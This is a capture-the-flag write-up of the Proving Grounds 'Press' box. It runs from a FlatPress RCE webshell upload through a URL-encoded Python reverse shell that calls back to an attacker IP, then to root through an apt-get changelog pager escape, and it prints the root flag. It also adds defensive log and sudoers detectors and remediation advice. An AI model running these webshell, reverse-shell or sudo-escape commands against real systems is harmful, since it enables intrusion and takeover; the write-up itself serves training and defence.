Box Overview

Press is a Linux machine from Offensive Security’s Proving Grounds featuring exploitation of FlatPress CMS and privilege escalation through apt-get sudo misconfiguration.

Enumeration

Nmap Scan

sudo nmap -sS -sC -A 192.168.227.29 -T4 -oN first.scan -p-

Open Ports:

  • 22/tcp - SSH (OpenSSH 8.4p1 Debian)
  • 80/tcp - HTTP (Apache 2.4.56) - “Lugx Gaming Shop HTML5 Template”
  • 8089/tcp - HTTP (Apache 2.4.56) - FlatPress fp-1.2.1

Service Identification

Port 8089 is running FlatPress - a flat-file blogging engine (no database required).

Version identified: FlatPress fp-1.2.1

Exploitation Research

Vulnerability Discovery

searchsploit flatpress

Results:

Flatpress - Cross-Site Scripting                          | php/webapps/10688.txt
Flatpress 0.1010.1 - Multiple XSS                         | php/webapps/35896.txt
Flatpress 0.804 < 0.812.1 - Local File Inclusion          | php/webapps/9801.txt
Flatpress 1.0 - Remote Code Execution                     | php/webapps/29515.pl
Flatpress 1.0.3 - CSRF / Arbitrary File Upload            | php/webapps/39870.html

Target exploit: Remote Code Execution

Initial Exploitation Attempt

Attempted 29515.pl without success.

Successful Exploit

Working exploit: CVE-2023-XXXX - FlatPress RCE

Exploit Execution

python3 updated_exploit.py 192.168.227.29:8089 admin password

Output:

Exploiting...
Logging in...
Login Successful!
Shell uploading...
Your Shell is Ready: http://192.168.227.29:8089/fp-content/attachs/gssto.php
Shell Usage: http://192.168.227.29:8089/fp-content/attachs/gssto.php?0=command

Webshell deployed!

Webshell Access

The exploit uploads a PHP webshell accessible at:

http://192.168.227.29:8089/fp-content/attachs/gssto.php?0=command

Commands are passed via the 0 parameter.

System Reconnaissance

Check whether python3 is available on the target for the reverse shell payload:

curl "http://192.168.227.29:8089/fp-content/attachs/gssto.php?0=which%20python3"
# /usr/bin/python3

Python3 available! ✅

Initial Access - Reverse Shell

Payload Generation

Generated Python3 reverse shell from revshells.com:

export RHOST="192.168.45.222";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

URL Encoding

URL-encoded the payload for safe transmission via GET parameter.

Reverse Shell Execution

Setup listener:

nc -nlvp 4444

Trigger payload:

curl "http://192.168.227.29:8089/fp-content/attachs/gssto.php?0=export%20RHOST%3D%22192.168.45.222%22%3Bexport%20RPORT%3D4444%3Bpython3%20-c%20%27import%20sys%2Csocket%2Cos%2Cpty%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28os.getenv%28%22RHOST%22%29%2Cint%28os.getenv%28%22RPORT%22%29%29%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cfd%29%20for%20fd%20in%20%280%2C1%2C2%29%5D%3Bpty.spawn%28%22%2Fbin%2Fbash%22%29%27"

Shell caught as www-data!

www-data@debian:/var/www/flatpress/fp-content/attachs$
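Detection side of the webshell traffic above, as an added example rather than part of the original writeup: a small Python scanner over Apache access-log lines that flags PHP executed from the FlatPress attachment directory and URL-decoded query strings carrying shell commands. The log lines are constructed for the example; the upload path and the 0 parameter are the ones this writeup shows.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-log lines modelled on the traffic in this writeup
# (webshell under fp-content/attachs/, URL-encoded command in the 0 parameter).
SAMPLE_LOG = """\
192.168.45.222 - - [10/May/2024:10:01:02 +0000] "POST /admin.php?p=uploader HTTP/1.1" 200 512 "-" "python-requests/2.31"
192.168.45.222 - - [10/May/2024:10:01:05 +0000] "GET /fp-content/attachs/gssto.php?0=id HTTP/1.1" 200 87 "-" "curl/8.0"
192.168.45.222 - - [10/May/2024:10:02:10 +0000] "GET /fp-content/attachs/gssto.php?0=export%20RHOST%3D%22192.168.45.222%22%3Bpython3%20-c%20%27import%20socket%27 HTTP/1.1" 200 0 "-" "curl/8.0"
192.168.45.10 - - [10/May/2024:10:03:00 +0000] "GET /fp-content/attachs/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
192.168.45.10 - - [10/May/2024:10:04:00 +0000] "GET /index.php?x=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# FlatPress keeps attachments here; nothing in this directory should ever run as PHP.
UPLOAD_DIRS = ("/fp-content/attachs/",)
SCRIPT_EXTS = (".php", ".phtml", ".phar")
# Substrings that mark an OS command rather than a normal parameter value.
SHELL_MARKERS = ("python3 -c", "/bin/sh", "/bin/bash", "socket.socket", "os.dup2")

def analyse(line):
    """Return an alert dict for one log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path = parts.path.lower()
    reasons = []
    if path.startswith(UPLOAD_DIRS) and path.endswith(SCRIPT_EXTS):
        reasons.append("script executed from upload directory")
    decoded = unquote(parts.query)  # undo the %xx encoding used to smuggle the payload
    if any(marker in decoded for marker in SHELL_MARKERS):
        reasons.append("shell command in query string")
    if not reasons:
        return None
    return {"ip": m["ip"], "time": m["ts"], "path": parts.path, "reasons": reasons}

def scan(log_text):
    """Run analyse() over every line and keep the alerts in log order."""
    return [a for a in (analyse(l) for l in log_text.splitlines()) if a]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["time"], alert["ip"], alert["path"], "; ".join(alert["reasons"]))
```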

System Enumeration

cd /home
ls -la
# Empty - no user home directories

grep -v nologin /etc/passwd
# Only root has shell access

No obvious user flag location found.

Privilege Escalation

Sudo Enumeration

sudo -l

Output:

User www-data may run the following commands on debian:
    (ALL) NOPASSWD: /usr/bin/apt-get

Vulnerability: Sudo access to apt-get without password! 🎯

GTFOBins Research

Reference: GTFOBins - apt-get

The apt-get changelog command opens a pager (less/more) which can be escaped to spawn a shell.

Exploitation

Execute apt-get changelog

sudo apt-get changelog apt

Output:

Get:1 store: apt 2.2.4 Changelog
Fetched 487 kB in 0s (0 B/s)
WARNING: terminal is not fully functional
/tmp/apt-changelog-aDmE5L/apt.changelog  (press RETURN)

The changelog opens in a pager (similar to less).

Pager Escape

From within the pager, execute shell escape:

!/bin/sh

Root shell spawned! 🎯

# id
uid=0(root) gid=0(root) groups=0(root)

Root Flag

cd /root
ls
# email8.txt  proof.txt

cat proof.txt
# a9c446d07f3f1454e2c942b9d13d6416

Root flag captured!

Get pwnd! 💀

Attack Chain Summary

  1. Port Scanning → Identified FlatPress on port 8089
  2. Vulnerability Research → Found FlatPress RCE exploit
  3. Webshell Upload → Exploited FlatPress to deploy PHP shell
  4. Reverse Shell → URL-encoded Python3 payload for stable shell
  5. Sudo Enumeration → Discovered apt-get sudo access
  6. GTFOBins Lookup → Found pager escape technique
  7. Privilege Escalation → Escaped changelog pager to root shell
  8. Root Access → Full system compromise

Key Takeaways

Vulnerabilities Exploited

  1. FlatPress RCE - Unauthenticated remote code execution
  2. Default Credentials - admin:password worked for exploit
  3. Sudo Misconfiguration - apt-get allowed without password
  4. Pager Escape - Less/more pagers allow shell spawning

Technical Details

FlatPress Exploitation

The exploit leverages:

  • Authentication bypass or default credentials
  • File upload vulnerability
  • PHP code execution through uploaded files

apt-get Privilege Escalation

How it works:

  1. apt-get changelog fetches package changelog
  2. Opens changelog in pager (less/more)
  3. Pager allows command execution via !command
  4. Commands execute with sudo privileges
  5. Spawning shell gives root access
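What the escalation above leaves in the sudo log, as an added example (not part of the original writeup): a Python classifier over syslog-style sudo entries that flags service accounts invoking sudo at all and pager-spawning commands such as apt-get changelog run as root. The entries follow the standard sudo syslog line layout but are constructed for this example.

```python
import re

# Constructed syslog-style sudo entries (not from the writeup's box). The first
# mirrors the escalation step in this writeup: www-data running apt-get changelog as root.
SAMPLE_AUTH_LOG = """\
May 10 10:05:01 debian sudo: www-data : TTY=pts/0 ; PWD=/var/www/flatpress/fp-content/attachs ; USER=root ; COMMAND=/usr/bin/apt-get changelog apt
May 10 10:05:30 debian sudo:     root : TTY=pts/0 ; PWD=/root ; USER=root ; COMMAND=/bin/ls
May 10 10:06:00 debian sudo:    admin : TTY=pts/1 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/apt-get update
May 10 10:06:30 debian sudo:    admin : TTY=pts/1 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/less /var/log/syslog
"""

SUDO_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ [\d:]+) (?P<host>\S+) sudo:\s+(?P<user>\S+) : '
    r'TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$'
)
# Accounts that serve daemons and should never be at a sudo prompt.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}
# apt-get / apt subcommands that hand the caller an interactive pager.
PAGER_SUBCOMMANDS = {"changelog"}
PAGERS = {"less", "more", "most"}

def classify(line):
    """Parse one sudo log line and attach the reasons it deserves attention (may be empty)."""
    m = SUDO_RE.match(line)
    if not m:
        return None
    argv = m["cmd"].split() or [""]
    prog = argv[0].rsplit("/", 1)[-1]
    reasons = []
    if m["user"] in SERVICE_ACCOUNTS:
        reasons.append(f"service account {m['user']} used sudo")
    if prog in {"apt-get", "apt"} and len(argv) > 1 and argv[1] in PAGER_SUBCOMMANDS:
        reasons.append(f"{prog} {argv[1]} opens a pager under sudo")
    if prog in PAGERS:
        reasons.append(f"pager {prog} run under sudo")
    return {"time": m["ts"], "user": m["user"], "runas": m["runas"], "cmd": m["cmd"], "reasons": reasons}

def alerts(log_text):
    """Events with at least one reason, those with the most reasons first."""
    events = [e for e in map(classify, log_text.splitlines()) if e and e["reasons"]]
    return sorted(events, key=lambda e: -len(e["reasons"]))

if __name__ == "__main__":
    for e in alerts(SAMPLE_AUTH_LOG):
        print(e["time"], e["user"], "->", e["runas"], e["cmd"], "|", "; ".join(e["reasons"]))
```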

Remediation

FlatPress Security

  • Update to latest patched version
  • Change default credentials immediately
  • Implement file upload restrictions
  • Validate and sanitize user inputs
  • Regular security audits

Sudo Configuration

# BAD - Allows privilege escalation
www-data ALL=(ALL) NOPASSWD: /usr/bin/apt-get

# BETTER - Restrict to specific safe operations
www-data ALL=(ALL) NOPASSWD: /usr/bin/apt-get update
www-data ALL=(ALL) NOPASSWD: /usr/bin/apt-get upgrade

# BEST - Use a package management wrapper
# Create custom script that safely calls apt-get
# Grant sudo only to that wrapper

Additional mitigations:

  • Avoid granting package managers to web users
  • Use configuration management tools instead
  • Implement proper access controls
  • Monitor sudo command execution
  • Regular sudo configuration audits
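An audit for the sudoers patterns above, added here and not from the writeup: it parses sudoers entries in Python, rates unrestricted entries for pager-spawning programs (the BAD line) as high, and rates the argument-restricted update/upgrade entries (the BETTER lines) as low. The sample sudoers text and the list of interactive programs are constructed assumptions for the example; low-risk entries are still worth confirming to run non-interactively.

```python
import re
import shlex
from os.path import basename

# Constructed sudoers excerpt: the BAD and BETTER entries from this writeup plus
# two extra lines to exercise the checks.
SAMPLE_SUDOERS = """\
Defaults env_reset
root     ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: /usr/bin/apt-get
www-data ALL=(ALL) NOPASSWD: /usr/bin/apt-get update, /usr/bin/apt-get upgrade
backup   ALL=(ALL) NOPASSWD: /usr/bin/apt-get changelog apt   # opens a pager
"""

ENTRY_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*'
    r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$'
)
# Programs that hand the caller a pager or editor during normal use (assumed GTFOBins-style list).
INTERACTIVE = {"apt-get", "apt", "less", "more", "vi", "vim", "nano", "man"}
# apt-get subcommands the writeup's BETTER config treats as acceptable.
LOW_RISK_APT_ARGS = {"update", "upgrade"}

def audit_entry(line):
    """Return (user, program, severity, reason) tuples for one sudoers line."""
    line = line.split("#", 1)[0].strip()  # drop trailing comments
    m = ENTRY_RE.match(line) if line else None
    if not m or m["user"] == "root":  # root is expected to have ALL; skip it
        return []
    nopasswd = "NOPASSWD" in m["tags"].upper()
    findings = []
    for spec in m["cmds"].split(","):  # one entry may list several commands
        argv = shlex.split(spec)
        if not argv:
            continue
        prog, args = basename(argv[0]), argv[1:]
        if prog == "ALL":
            sev, why = "high", "any command as " + m["runas"]
        elif prog in {"apt-get", "apt"} and args and args[0] in LOW_RISK_APT_ARGS:
            sev, why = "low", f"restricted to '{prog} {args[0]}'"
        elif prog in INTERACTIVE:
            sev, why = "high", ("unrestricted " if not args else "") + f"{prog} can open a pager or editor (shell escape)"
        else:
            sev, why = "info", "review manually"
        if nopasswd:
            why += ", no password required"
        findings.append((m["user"], prog, sev, why))
    return findings

def audit(sudoers_text):
    """Audit every line of a sudoers file and return all findings in file order."""
    return [f for line in sudoers_text.splitlines() for f in audit_entry(line)]
```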

Tools Used

  • nmap
  • searchsploit
  • Python3 (exploit execution)
  • curl (webshell interaction)
  • netcat (reverse shell listener)
  • GTFOBins (privilege escalation reference)

Techniques

  • Service version enumeration
  • Public exploit research
  • Webshell deployment
  • Reverse shell generation with URL encoding
  • Sudo enumeration
  • Pager escape exploitation

GTFOBins Commands Reference

apt-get Changelog Escape

# Open changelog
sudo apt-get changelog <package>

# Inside pager, execute:
!/bin/sh
# or
!/bin/bash

Alternative apt-get Methods

# If apt has sudo access
sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh

Credits

Box Creator: Offensive Security
Platform: Proving Grounds Practice


“When you see package managers in sudo, check GTFOBins first!”